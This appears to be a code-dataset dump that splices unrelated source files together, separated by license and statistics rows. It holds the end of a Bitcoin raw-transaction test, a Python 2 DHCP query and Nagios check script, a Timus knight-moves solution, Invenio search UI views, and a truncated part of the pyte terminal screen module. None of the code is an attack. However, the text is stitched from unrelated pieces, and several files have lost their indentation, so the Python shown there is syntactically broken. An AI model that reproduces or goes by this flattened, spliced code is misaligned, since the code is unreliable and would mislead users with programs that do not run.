assert_equal(rawTxSigned['complete'], True) #node2 can sign the tx compl., own two of three keys
self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# 2of2 test for combining transactions
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = False
for outpoint in rawTx2['vout']:
if outpoint['value'] == Decimal('2.20000000'):
vout = outpoint
break
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "redeemScript" : mSigObjValid['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
self.log.info(rawTxPartialSigned1)
        assert_equal(rawTxPartialSigned1['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
self.log.info(rawTxPartialSigned2)
assert_equal(rawTxPartialSigned2['complete'], False) #node2 only has one key, can't comp. sign the tx
rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
self.log.info(rawTxComb)
self.nodes[2].sendrawtransaction(rawTxComb)
rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# decoderawtransaction tests
# witness transaction
encrawtx = "010000000001010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f50500000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction
# non-witness transaction
encrawtx = "01000000010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f505000000000000000000"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
# getrawtransaction tests
# 1. valid parameters - only supply txid
txHash = rawTx["hash"]
assert_equal(self.nodes[0].getrawtransaction(txHash), rawTxSigned['hex'])
# 2. valid parameters - supply txid and 0 for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txHash, 0), rawTxSigned['hex'])
# 3. valid parameters - supply txid and False for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txHash, False), rawTxSigned['hex'])
# 4. valid parameters - supply txid and 1 for verbose.
# We only check the "hex" field of the output so we don't need to update this test every time the output format changes.
assert_equal(self.nodes[0].getrawtransaction(txHash, 1)["hex"], rawTxSigned['hex'])
# 5. valid parameters - supply txid and True for non-verbose
assert_equal(self.nodes[0].getrawtransaction(txHash, True)["hex"], rawTxSigned['hex'])
# 6. invalid parameters - supply txid and string "Flase"
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txHash, "Flase")
# 7. invalid parameters - supply txid and empty array
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txHash, [])
# 8. invalid parameters - supply txid and empty dict
assert_raises_rpc_error(-1, "not a boolean", self.nodes[0].getrawtransaction, txHash, {})
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 1000)
# 9. invalid parameters - sequence number out of range
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : -1}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
# 10. invalid parameters - sequence number out of range
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 4294967296}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 4294967294}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 4294967294)
if __name__ == '__main__':
RawTransactionsTest().main()
| mit | 7,541,542,807,572,354,000 | 54.654434 | 233 | 0.658882 | false | 3.66472 | true | false | false |
L337hium/dhquery | dhquery.py | 1 | 7156 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fileencoding=utf-8
# vim:tabstop=2
from random import Random
from optparse import OptionParser
from pydhcplib.dhcp_packet import DhcpPacket
from pydhcplib.dhcp_network import DhcpClient
from pydhcplib.type_hw_addr import hwmac
from pydhcplib.type_ipv4 import ipv4
import socket
import sys
r = Random()
r.seed()
dhcpTypes = {
1: 'DISCOVER',
2: 'OFFER',
3: 'REQUEST',
4: 'DECLINE',
5: 'ACK',
6: 'NACK',
7: 'RELEASE',
8: 'INFORM',
}
nagiosRC = {
0: 'OK',
1: 'Warning',
2: 'Critical',
3: 'Unknown',
}
def nagiosExit(rc,message):
print "%s: %s"%(nagiosRC.get(rc,'???'),message)
sys.exit(rc)
class SilentClient(DhcpClient):
def HandleDhcpAck(self,p):
return
def HandleDhcpNack(self,p):
return
def HandleDhcpOffer(self,p):
return
def HandleDhcpUnknown(self,p):
return
def HandleDhcpDiscover(self,p):
return
def genxid():
decxid = r.randint(0,0xffffffff)
xid = []
for i in xrange(4):
xid.insert(0, decxid & 0xff)
decxid = decxid >> 8
return xid
def genmac():
i = []
for z in xrange(6):
i.append(r.randint(0,255))
return ':'.join(map(lambda x: "%02x"%x,i))
def receivePacket(serverip, serverport, timeout, req):
"""Sends and receives packet from DHCP server"""
client = SilentClient(client_listen_port=67, server_listen_port=serverport)
client.dhcp_socket.settimeout(timeout)
if serverip == '0.0.0.0': req.SetOption('flags',[128, 0])
req_type = req.GetOption('dhcp_message_type')[0]
client.SendDhcpPacketTo(serverip,req)
	# Don't wait for an answer to a RELEASE message
if req_type == 7: return None
res = client.GetNextDhcpPacket()
# Try next packet if this packet is the same as packet we've sent.
if res.GetOption('dhcp_message_type')[0] == req_type: res = client.GetNextDhcpPacket()
return res
def preparePacket(xid=None,giaddr='0.0.0.0',chaddr='00:00:00:00:00:00',ciaddr='0.0.0.0',msgtype='discover',required_opts=[]):
req = DhcpPacket()
req.SetOption('op',[1])
req.SetOption('htype',[1])
req.SetOption('hlen',[6])
req.SetOption('hops',[0])
if not xid: xid = genxid()
req.SetOption('xid',xid)
req.SetOption('giaddr',ipv4(giaddr).list())
req.SetOption('chaddr',hwmac(chaddr).list() + [0] * 10)
req.SetOption('ciaddr',ipv4(ciaddr).list())
if msgtype == 'request':
mt = 3
elif msgtype == 'release':
mt = 7
else:
mt = 1
req.SetOption('dhcp_message_type',[mt])
# req.SetOption('parameter_request_list',1)
return req
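# e.g. (illustrative): a broadcast DISCOVER for a freshly generated client MAC:
#   req = preparePacket(chaddr=genmac(), msgtype='discover')
#   res = receivePacket(serverip='0.0.0.0', serverport=67, timeout=4, req=req)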
def main():
parser = OptionParser()
parser.add_option("-s","--server", dest="server", default='0.0.0.0', help="DHCP server IP (default %default)")
parser.add_option("-p","--port", type="int", dest="port", default=67, help="DHCP server port (default (%default)")
parser.add_option("-m","--mac","--chaddr", dest="chaddr", help="chaddr: Client's MAC address, default random")
parser.add_option("-c","--ciaddr", dest="ciaddr", default='0.0.0.0', help="ciaddr: Client's desired IP address")
parser.add_option("-g","--giaddr", dest="giaddr", default='0.0.0.0', help="giaddr: Gateway IP address (if any)")
parser.add_option("-t","--type", dest="msgtype", type="choice", choices=["discover","request","release"],
default="discover", help="DHCP message type: discover, request, release (default %default)")
parser.add_option("-w","--timeout", dest="timeout", type="int", default=4, help="UDP timeout (default %default)")
parser.add_option("-r","--require", action="append", type="int", default=[1,3,6,51], dest="required_opts", help="Require options by its number")
parser.add_option("-y","--cycle", action="store_true", dest="docycle", help="Do full cycle: DISCOVERY, REQUEST, RELEASE")
parser.add_option("-n","--cycles", dest="cycles", type="int", default="1", help="Do number of cycles (default %default)")
parser.add_option("-v","--verbose", action="store_true", dest="verbose", help="Verbose operation")
parser.add_option("-q","--quiet", action="store_false", dest="verbose", help="Quiet operation")
parser.add_option("--nagios", action="store_true", dest="nagios", help="Nagios mode of operation")
(opts, args) = parser.parse_args()
if not opts.chaddr:
chaddr = genmac()
else:
chaddr = opts.chaddr
if opts.nagios: opts.verbose = False
verbose = opts.verbose
if opts.docycle:
request_dhcp_message_type = "discover"
else:
request_dhcp_message_type = opts.msgtype
request_ciaddr = opts.ciaddr
serverip = opts.server
cycleno = 1
xid = genxid()
while True:
if opts.cycles > 1 and opts.verbose is not False and (not opts.docycle or request_dhcp_message_type == "discover"):
print "="*100
print "| Cycle %s"%cycleno
print "="*100
req = preparePacket(xid=xid, giaddr=opts.giaddr, chaddr=chaddr, ciaddr=request_ciaddr, msgtype=request_dhcp_message_type, required_opts=opts.required_opts)
if verbose != False:
print "Sending %s [%s] packet to %s"%(request_dhcp_message_type.upper(),chaddr, opts.server)
if verbose == True:
print "-"*100
req.PrintHeaders()
req.PrintOptions()
print "="*100
print "\n"
try:
res = receivePacket(serverip=serverip, serverport=opts.port, timeout=opts.timeout, req=req)
except socket.timeout:
res = None
if opts.nagios: nagiosExit(2,"%s request has been timed out."%request_dhcp_message_type.upper())
if verbose != False: print "Timed out."
pass
if res:
dhcp_message_type = res.GetOption('dhcp_message_type')[0]
server_identifier = ipv4(res.GetOption('server_identifier'))
chaddr = hwmac(res.GetOption('chaddr')[:6])
yiaddr = ipv4(res.GetOption('yiaddr'))
if opts.nagios and dhcp_message_type not in (2, 5):
nagiosExit(2,"Got %s response for our %s request"%(dhcpTypes.get(dhcp_message_type,'UNKNOWN'),dhcpTypes.get(request_dhcp_message_type,'UNKNOWN')))
if verbose != False:
print "Received %s packet from %s; [%s] was bound to %s"%(dhcpTypes.get(dhcp_message_type,'UNKNOWN'), server_identifier, chaddr, yiaddr )
if verbose == True:
print "-"*100
res.PrintHeaders()
res.PrintOptions()
print "="*100
print "\n"
if opts.docycle:
if dhcp_message_type == 2:
request_dhcp_message_type = 'request'
request_ciaddr = yiaddr.str()
serverip = server_identifier.str()
continue
if dhcp_message_type == 5:
request_dhcp_message_type = 'release'
request_ciaddr = yiaddr.str()
serverip = server_identifier.str()
continue
cycleno += 1
if cycleno > opts.cycles:
if opts.nagios:
if res:
nagiosExit(0,"%s finished successfully: %s. yiaddr: %s, chaddr: %s"%(
request_dhcp_message_type.upper(),
dhcpTypes.get(dhcp_message_type,'UNKNOWN'),
yiaddr,
chaddr,
))
elif opts.docycle:
nagiosExit(0,"Cycle has been finished successfully. Got %s for %s"%(yiaddr,chaddr))
else:
nagiosExit(0,"%s has been finished without the answer"%(request_dhcp_message_type.upper()))
break
if opts.docycle:
request_dhcp_message_type = "discover"
request_ciaddr = opts.ciaddr
serverip = opts.server
xid = genxid()
if not opts.chaddr:
chaddr = genmac()
else:
chaddr = opts.chaddr
if __name__ == '__main__':
main()
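# Example invocations (illustrative; server addresses are placeholders):
#   ./dhquery.py -s 192.0.2.1 -t discover      # single DISCOVER
#   ./dhquery.py -s 192.0.2.1 -y -n 3          # three DISCOVER/REQUEST/RELEASE cycles
#   ./dhquery.py -s 192.0.2.1 -y --nagios      # same cycle reported as a Nagios check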
| gpl-2.0 | -6,692,521,198,314,802,000 | 29.712446 | 157 | 0.670486 | false | 2.9054 | false | false | false |
AHJenin/acm-type-problems | Timus/AC/1197-Lonesome_Knight.py | 1 | 1209 | #!/usr/bin/env python3
#
# FILE: 1197-Lonesome_Knight.py
#
# @author: Arafat Hasan Jenin <opendoor.arafat[at]gmail[dot]com>
#
# LINK:
#
# DATE CREATED: 15-06-18 15:40:41 (+06)
# LAST MODIFIED: 15-06-18 17:29:41 (+06)
#
# VERDICT: Accepted
#
# DEVELOPMENT HISTORY:
# Date Version Description
# --------------------------------------------------------------------
# 15-06-18 1.0 Deleted code is debugged code.
#
# _/ _/_/_/_/ _/ _/ _/_/_/ _/ _/
# _/ _/ _/_/ _/ _/ _/_/ _/
# _/ _/_/_/ _/ _/ _/ _/ _/ _/ _/
# _/ _/ _/ _/ _/_/ _/ _/ _/_/
# _/_/ _/_/_/_/ _/ _/ _/_/_/ _/ _/
#
##############################################################################
dx = [2, 1, -1, -2, -2, -1, 1, 2]
dy = [1, 2, 2, 1, -1, -2, -2, -1] # Knight Direction
N = int(input())
while (N > 0):
N -= 1
pos = input()
x = ord(pos[0]) - ord('a')
y = int(pos[1]) - 1
ans = 0
for i in range(0, 8):
new_x = x + dx[i]
new_y = y + dy[i]
if new_x >= 0 and new_x < 8 and new_y >= 0 and new_y < 8:
ans += 1
print(ans)
| mit | 8,361,550,323,378,487,000 | 27.116279 | 78 | 0.322581 | false | 2.503106 | false | false | false |
nikofil/invenio-search-ui | invenio_search_ui/views.py | 1 | 2169 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015, 2016 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""UI for Invenio-Search."""
from __future__ import absolute_import, print_function
from flask import Blueprint, current_app, json, render_template
blueprint = Blueprint(
'invenio_search_ui',
__name__,
template_folder='templates',
static_folder='static',
)
@blueprint.route("/search")
def search():
"""Search page ui."""
return render_template(current_app.config['SEARCH_UI_SEARCH_TEMPLATE'])
def sorted_options(sort_options):
"""Sort sort options for display.
:param sort_options: A dictionary containing the field name as key and
asc/desc as value.
:returns: A dictionary with sorting options for Invenio-Search-JS.
"""
return [
{
'title': v['title'],
'value': ('-{0}'.format(k)
if v.get('default_order', 'asc') == 'desc' else k),
}
for k, v in
sorted(sort_options.items(), key=lambda x: x[1].get('order', 0))
]
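# Example (hypothetical config, not part of the original module): given
#     {'title': {'title': 'Title', 'order': 1},
#      'date': {'title': 'Date', 'order': 2, 'default_order': 'desc'}}
# sorted_options() returns
#     [{'title': 'Title', 'value': 'title'},
#      {'title': 'Date', 'value': '-date'}]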
@blueprint.app_template_filter('format_sortoptions')
def format_sortoptions(sort_options):
"""Create sort options JSON dump for Invenio-Search-JS."""
return json.dumps({
'options': sorted_options(sort_options)
})
| gpl-2.0 | 7,984,396,494,800,520,000 | 30.897059 | 76 | 0.68142 | false | 3.894075 | false | false | false |
dmilith/SublimeText3-dmilith | Packages/pyte/all/pyte/screens.py | 1 | 46773 | # -*- coding: utf-8 -*-
"""
pyte.screens
~~~~~~~~~~~~
This module provides classes for terminal screens, currently
it contains three screens with different features:
* :class:`~pyte.screens.Screen` -- base screen implementation,
which handles all the core escape sequences, recognized by
:class:`~pyte.streams.Stream`.
* If you need a screen to keep track of the changed lines
(which you probably do need) -- use
:class:`~pyte.screens.DiffScreen`.
* If you also want a screen to collect history and allow
pagination -- :class:`pyte.screen.HistoryScreen` is here
for ya ;)
.. note:: It would be nice to split those features into mixin
classes, rather than subclasses, but it's not obvious
          how to do so -- feel free to submit a pull request.
:copyright: (c) 2011-2012 by Selectel.
:copyright: (c) 2012-2017 by pyte authors and contributors,
see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
from __future__ import absolute_import, unicode_literals, division
import copy
import json
import math
import os
import sys
import unicodedata
import warnings
from collections import deque, namedtuple, defaultdict
from wcwidth import wcwidth
# There is no standard 2.X backport for ``lru_cache``.
if sys.version_info >= (3, 2):
from functools import lru_cache
wcwidth = lru_cache(maxsize=4096)(wcwidth)
from . import (
charsets as cs,
control as ctrl,
graphics as g,
modes as mo
)
from .compat import map, range, str
from .streams import Stream
#: A container for screen's scroll margins.
Margins = namedtuple("Margins", "top bottom")
#: A container for savepoint, created on :data:`~pyte.escape.DECSC`.
Savepoint = namedtuple("Savepoint", [
"cursor",
"g0_charset",
"g1_charset",
"charset",
"origin",
"wrap"
])
class Char(namedtuple("Char", [
"data",
"fg",
"bg",
"bold",
"italics",
"underscore",
"strikethrough",
"reverse",
])):
"""A single styled on-screen character.
:param str data: unicode character. Invariant: ``len(data) == 1``.
:param str fg: foreground colour. Defaults to ``"default"``.
:param str bg: background colour. Defaults to ``"default"``.
:param bool bold: flag for rendering the character using bold font.
Defaults to ``False``.
:param bool italics: flag for rendering the character using italic font.
Defaults to ``False``.
:param bool underscore: flag for rendering the character underlined.
Defaults to ``False``.
:param bool strikethrough: flag for rendering the character with a
strike-through line. Defaults to ``False``.
:param bool reverse: flag for swapping foreground and background colours
during rendering. Defaults to ``False``.
"""
__slots__ = ()
def __new__(cls, data, fg="default", bg="default", bold=False,
italics=False, underscore=False,
strikethrough=False, reverse=False):
return super(Char, cls).__new__(cls, data, fg, bg, bold, italics,
underscore, strikethrough, reverse)
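# Illustration (not part of the original source): Char(" ") is a blank cell
# with default styling, while Char("x", fg="red", bold=True) is a bold red "x".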
class Cursor(object):
"""Screen cursor.
:param int x: 0-based horizontal cursor position.
:param int y: 0-based vertical cursor position.
:param pyte.screens.Char attrs: cursor attributes (see
:meth:`~pyte.screens.Screen.select_graphic_rendition`
for details).
"""
__slots__ = ("x", "y", "attrs", "hidden")
def __init__(self, x, y, attrs=Char(" ")):
self.x = x
self.y = y
self.attrs = attrs
self.hidden = False
class StaticDefaultDict(dict):
"""A :func:`dict` with a static default value.
Unlike :func:`collections.defaultdict` this implementation does not
implicitly update the mapping when queried with a missing key.
>>> d = StaticDefaultDict(42)
>>> d["foo"]
42
>>> d
{}
"""
def __init__(self, default):
self.default = default
def __missing__(self, key):
return self.default
class Screen(object):
"""
A screen is an in-memory matrix of characters that represents the
screen display of the terminal. It can be instantiated on its own
and given explicit commands, or it can be attached to a stream and
will respond to events.
.. attribute:: buffer
A sparse ``lines x columns`` :class:`~pyte.screens.Char` matrix.
.. attribute:: dirty
A set of line numbers, which should be re-drawn. The user is responsible
for clearing this set when changes have been applied.
>>> screen = Screen(80, 24)
>>> screen.dirty.clear()
>>> screen.draw("!")
>>> list(screen.dirty)
[0]
.. versionadded:: 0.7.0
.. attribute:: cursor
Reference to the :class:`~pyte.screens.Cursor` object, holding
cursor position and attributes.
.. attribute:: margins
Margins determine which screen lines move during scrolling
(see :meth:`index` and :meth:`reverse_index`). Characters added
outside the scrolling region do not make the screen to scroll.
The value is ``None`` if margins are set to screen boundaries,
otherwise -- a pair 0-based top and bottom line indices.
.. attribute:: charset
Current charset number; can be either ``0`` or ``1`` for `G0`
and `G1` respectively, note that `G0` is activated by default.
.. note::
According to ``ECMA-48`` standard, **lines and columns are
1-indexed**, so, for instance ``ESC [ 10;10 f`` really means
-- move cursor to position (9, 9) in the display matrix.
.. versionchanged:: 0.4.7
.. warning::
:data:`~pyte.modes.LNM` is reset by default, to match VT220
       specification. Unfortunately this makes :mod:`pyte` fail
``vttest`` for cursor movement.
.. versionchanged:: 0.4.8
.. warning::
       If `DECAWM` mode is set then a cursor will be wrapped to the
**beginning** of the next line, which is the behaviour described
in ``man console_codes``.
.. seealso::
`Standard ECMA-48, Section 6.1.1 \
<http://ecma-international.org/publications/standards/Ecma-048.htm>`_
for a description of the presentational component, implemented
by ``Screen``.
"""
@property
def default_char(self):
"""An empty character with default foreground and background colors."""
reverse = mo.DECSCNM in self.mode
return Char(data=" ", fg="default", bg="default", reverse=reverse)
def __init__(self, columns, lines):
self.savepoints = []
self.columns = columns
self.lines = lines
self.buffer = defaultdict(lambda: StaticDefaultDict(self.default_char))
self.dirty = set()
self.reset()
def __repr__(self):
return ("{0}({1}, {2})".format(self.__class__.__name__,
self.columns, self.lines))
@property
def display(self):
"""A :func:`list` of screen lines as unicode strings."""
def render(line):
is_wide_char = False
for x in range(self.columns):
if is_wide_char: # Skip stub
is_wide_char = False
continue
char = line[x].data
assert sum(map(wcwidth, char[1:])) == 0
is_wide_char = wcwidth(char[0]) == 2
yield char
return ["".join(render(self.buffer[y])) for y in range(self.lines)]
def reset(self):
"""Reset the terminal to its initial state.
* Scrolling margins are reset to screen boundaries.
* Cursor is moved to home location -- ``(0, 0)`` and its
attributes are set to defaults (see :attr:`default_char`).
* Screen is cleared -- each character is reset to
:attr:`default_char`.
* Tabstops are reset to "every eight columns".
* All lines are marked as :attr:`dirty`.
.. note::
Neither VT220 nor VT102 manuals mention that terminal modes
and tabstops should be reset as well, thanks to
:manpage:`xterm` -- we now know that.
"""
self.dirty.update(range(self.lines))
self.buffer.clear()
self.margins = None
self.mode = set([mo.DECAWM, mo.DECTCEM])
self.title = ""
self.icon_name = ""
self.charset = 0
self.g0_charset = cs.LAT1_MAP
self.g1_charset = cs.VT100_MAP
# From ``man terminfo`` -- "... hardware tabs are initially
# set every `n` spaces when the terminal is powered up. Since
# we aim to support VT102 / VT220 and linux -- we use n = 8.
self.tabstops = set(range(8, self.columns, 8))
self.cursor = Cursor(0, 0)
self.cursor_position()
self.saved_columns = None
def resize(self, lines=None, columns=None):
"""Resize the screen to the given size.
If the requested screen size has more lines than the existing
screen, lines will be added at the bottom. If the requested
size has less lines than the existing screen lines will be
clipped at the top of the screen. Similarly, if the existing
screen has less columns than the requested screen, columns will
be added at the right, and if it has more -- columns will be
clipped at the right.
:param int lines: number of lines in the new screen.
:param int columns: number of columns in the new screen.
.. versionchanged:: 0.7.0
If the requested screen size is identical to the current screen
size, the method does nothing.
"""
lines = lines or self.lines
columns = columns or self.columns
if lines == self.lines and columns == self.columns:
return # No changes.
self.dirty.update(range(lines))
if lines < self.lines:
self.save_cursor()
self.cursor_position(0, 0)
self.delete_lines(self.lines - lines) # Drop from the top.
self.restore_cursor()
if columns < self.columns:
for line in self.buffer.values():
for x in range(columns, self.columns):
line.pop(x, None)
self.lines, self.columns = lines, columns
self.set_margins()
def set_margins(self, top=None, bottom=None):
"""Select top and bottom margins for the scrolling region.
:param int top: the smallest line number that is scrolled.
:param int bottom: the biggest line number that is scrolled.
"""
if top is None and bottom is None:
self.margins = None
return
margins = self.margins or Margins(0, self.lines - 1)
# Arguments are 1-based, while :attr:`margins` are zero
# based -- so we have to decrement them by one. We also
# make sure that both of them is bounded by [0, lines - 1].
if top is None:
top = margins.top
else:
top = max(0, min(top - 1, self.lines - 1))
if bottom is None:
bottom = margins.bottom
else:
bottom = max(0, min(bottom - 1, self.lines - 1))
# Even though VT102 and VT220 require DECSTBM to ignore
# regions of width less than 2, some programs (like aptitude
# for example) rely on it. Practicality beats purity.
if bottom - top >= 1:
self.margins = Margins(top, bottom)
# The cursor moves to the home position when the top and
# bottom margins of the scrolling region (DECSTBM) changes.
self.cursor_position()
def set_mode(self, *modes, **kwargs):
"""Set (enable) a given list of modes.
:param list modes: modes to set, where each mode is a constant
from :mod:`pyte.modes`.
"""
        # Private mode codes are shifted, to be distinguished from non
# private ones.
if kwargs.get("private"):
modes = [mode << 5 for mode in modes]
if mo.DECSCNM in modes:
self.dirty.update(range(self.lines))
self.mode.update(modes)
# When DECOLM mode is set, the screen is erased and the cursor
# moves to the home position.
if mo.DECCOLM in modes:
self.saved_columns = self.columns
self.resize(columns=132)
self.erase_in_display(2)
self.cursor_position()
# According to VT520 manual, DECOM should also home the cursor.
if mo.DECOM in modes:
self.cursor_position()
# Mark all displayed characters as reverse.
if mo.DECSCNM in modes:
for line in self.buffer.values():
line.default = self.default_char
for x in line:
line[x] = line[x]._replace(reverse=True)
self.select_graphic_rendition(7) # +reverse.
# Make the cursor visible.
if mo.DECTCEM in modes:
self.cursor.hidden = False
def reset_mode(self, *modes, **kwargs):
"""Reset (disable) a given list of modes.
:param list modes: modes to reset -- hopefully, each mode is a
constant from :mod:`pyte.modes`.
"""
# Private mode codes are shifted, to be distinguished from non
# private ones.
if kwargs.get("private"):
modes = [mode << 5 for mode in modes]
if mo.DECSCNM in modes:
self.dirty.update(range(self.lines))
self.mode.difference_update(modes)
# Lines below follow the logic in :meth:`set_mode`.
if mo.DECCOLM in modes:
if self.columns == 132 and self.saved_columns is not None:
self.resize(columns=self.saved_columns)
self.saved_columns = None
self.erase_in_display(2)
self.cursor_position()
if mo.DECOM in modes:
self.cursor_position()
if mo.DECSCNM in modes:
for line in self.buffer.values():
line.default = self.default_char
for x in line:
line[x] = line[x]._replace(reverse=False)
self.select_graphic_rendition(27) # -reverse.
# Hide the cursor.
if mo.DECTCEM in modes:
self.cursor.hidden = True
def define_charset(self, code, mode):
"""Define ``G0`` or ``G1`` charset.
:param str code: character set code, should be a character
from ``"B0UK"``, otherwise ignored.
:param str mode: if ``"("`` ``G0`` charset is defined, if
``")"`` -- we operate on ``G1``.
.. warning:: User-defined charsets are currently not supported.
"""
if code in cs.MAPS:
if mode == "(":
self.g0_charset = cs.MAPS[code]
elif mode == ")":
self.g1_charset = cs.MAPS[code]
def shift_in(self):
"""Select ``G0`` character set."""
self.charset = 0
def shift_out(self):
"""Select ``G1`` character set."""
self.charset = 1
def draw(self, data):
"""Display decoded characters at the current cursor position and
advances the cursor if :data:`~pyte.modes.DECAWM` is set.
:param str data: text to display.
.. versionchanged:: 0.5.0
Character width is taken into account. Specifically, zero-width
and unprintable characters do not affect screen state. Full-width
characters are rendered into two consecutive character containers.
"""
data = data.translate(
self.g1_charset if self.charset else self.g0_charset)
for char in data:
char_width = wcwidth(char)
# If this was the last column in a line and auto wrap mode is
# enabled, move the cursor to the beginning of the next line,
# otherwise replace characters already displayed with newly
# entered.
if self.cursor.x == self.columns:
if mo.DECAWM in self.mode:
self.dirty.add(self.cursor.y)
self.carriage_return()
self.linefeed()
elif char_width > 0:
self.cursor.x -= char_width
# If Insert mode is set, new characters move old characters to
# the right, otherwise terminal is in Replace mode and new
# characters replace old characters at cursor position.
if mo.IRM in self.mode and char_width > 0:
self.insert_characters(char_width)
line = self.buffer[self.cursor.y]
if char_width == 1:
line[self.cursor.x] = self.cursor.attrs._replace(data=char)
elif char_width == 2:
# A two-cell character has a stub slot after it.
line[self.cursor.x] = self.cursor.attrs._replace(data=char)
if self.cursor.x + 1 < self.columns:
line[self.cursor.x + 1] = self.cursor.attrs \
._replace(data="")
elif char_width == 0 and unicodedata.combining(char):
# A zero-cell character is combined with the previous
                # character either on this or preceding line.
if self.cursor.x:
last = line[self.cursor.x - 1]
normalized = unicodedata.normalize("NFC", last.data + char)
line[self.cursor.x - 1] = last._replace(data=normalized)
elif self.cursor.y:
last = self.buffer[self.cursor.y - 1][self.columns - 1]
normalized = unicodedata.normalize("NFC", last.data + char)
self.buffer[self.cursor.y - 1][self.columns - 1] = \
last._replace(data=normalized)
else:
break # Unprintable character or doesn't advance the cursor.
# .. note:: We can't use :meth:`cursor_forward()`, because that
# way, we'll never know when to linefeed.
if char_width > 0:
self.cursor.x = min(self.cursor.x + char_width, self.columns)
self.dirty.add(self.cursor.y)
def set_title(self, param):
"""Set terminal title.
.. note:: This is an XTerm extension supported by the Linux terminal.
"""
self.title = param
def set_icon_name(self, param):
"""Set icon name.
.. note:: This is an XTerm extension supported by the Linux terminal.
"""
self.icon_name = param
def carriage_return(self):
"""Move the cursor to the beginning of the current line."""
self.cursor.x = 0
def index(self):
"""Move the cursor down one line in the same column. If the
cursor is at the last line, create a new line at the bottom.
"""
top, bottom = self.margins or Margins(0, self.lines - 1)
if self.cursor.y == bottom:
# TODO: mark only the lines within margins?
self.dirty.update(range(self.lines))
for y in range(top, bottom):
self.buffer[y] = self.buffer[y + 1]
self.buffer.pop(bottom, None)
else:
self.cursor_down()
def reverse_index(self):
"""Move the cursor up one line in the same column. If the cursor
